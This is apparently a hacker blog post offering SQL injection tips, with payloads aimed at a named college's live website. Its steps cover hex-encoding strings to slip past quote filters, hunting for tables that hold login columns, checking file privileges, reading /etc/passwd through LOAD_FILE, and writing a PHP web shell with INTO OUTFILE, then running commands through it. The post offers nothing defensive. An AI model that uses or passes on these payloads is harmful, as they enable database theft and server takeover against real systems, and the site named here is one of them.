Assalam O Alikum
FOCSoft Friends, Readers
Tips/Tutorial By ..:::PriNcE HaxOr:::..
In this Article I will give You Some SQL Injection Tips.....
Tip 1: avoid use of qoutes '' "
When we are injecting a website and we reached a point where we need to use where clause and give input data, for example we are tyring to find column names of table admin we mostly use This Method,..
select column_name from information_schema.tables where table_name='admin'But it don't work all the time.. what to do next?
we can avoid use of quotes .. we can use hex values instead.. or convert the string in MySQL char
we use hackbar > SQL > MySQL char for it
Or
we can use encode options in hackbar Encoding>Hex Encoding>string to 00ff00ff
when you input string it will like "61646d696e"
we have to add 0x before it and make it like 0x61646d696e
and then add it in our query that will look like
select column_name from information_schema.tables where table_name=0x61646d696eYou inject a website with a big and awkward database , You get lots of table names and you
don't know which table might contain login details
so what you gonna do with it
usually you retrieve table name and then move to columns to find Login records
but in this case
we will scan all table name for some specific column in all databaseslets say our specific column is "user"
so to find out what table name contain this column we will use query like
UNION SELECT table_name From Information_Schema.columns where column_name="user"If it don't work we can hex column name (in our case, hex of password is 0x75736572)
SELECT table_name From Information_Schema.columns where column_name=0x75736572http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,group_concat(table_name))+from+inform ation_schema.columns where column_name=0x75736572![[Image: x9g0.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vv8JvJGM-5kTfda09PlVOAfyrnE7cDAZlY-lLhAjROMdz_Pl9Hldz0n4Izms9NsdgKvG1IW5m4NUu9taMMg3hNhPMeM46_QOnAlN2PPKzlIj3reQ=s0-d)
this query will look in all databases but if you want to search in current database you can add AND condition in query and make it look like
UNION SELECT table_name From Information_Schema.columns where column_name=hex_of_column_name and table_schema=database()Tip 3; Testing if your current db user can write/read permissions?
First you need to check the database user
you can find it using user()
and query will return data like root@localhost, user@localhost or just user / anything
So you got username whats next?
how to check if user have read write permissions?
easy
use this query
select file_priv from mysql.user where user='username'live Demo:,..
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365Tip 4; LIVE DEMO OF READING /etc/password
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))--Tip 5; What Next If You Got Write Permissions ???
If you got write permissions we can write our shell in any writable directories of website but how ??
using out file function but how to use it?
SELECT '' INTO OUTFILE '/var/www/dir/mad.php'NOTE: /var/www/dir/mad.php is just an imaginary directory for this article .. you have to find root path yourself :)
Tip6; How To Access The Shell?
just go to dir you provided like this
yourwebsite.com/dir/mad.php?mad=whoami
Post a Comment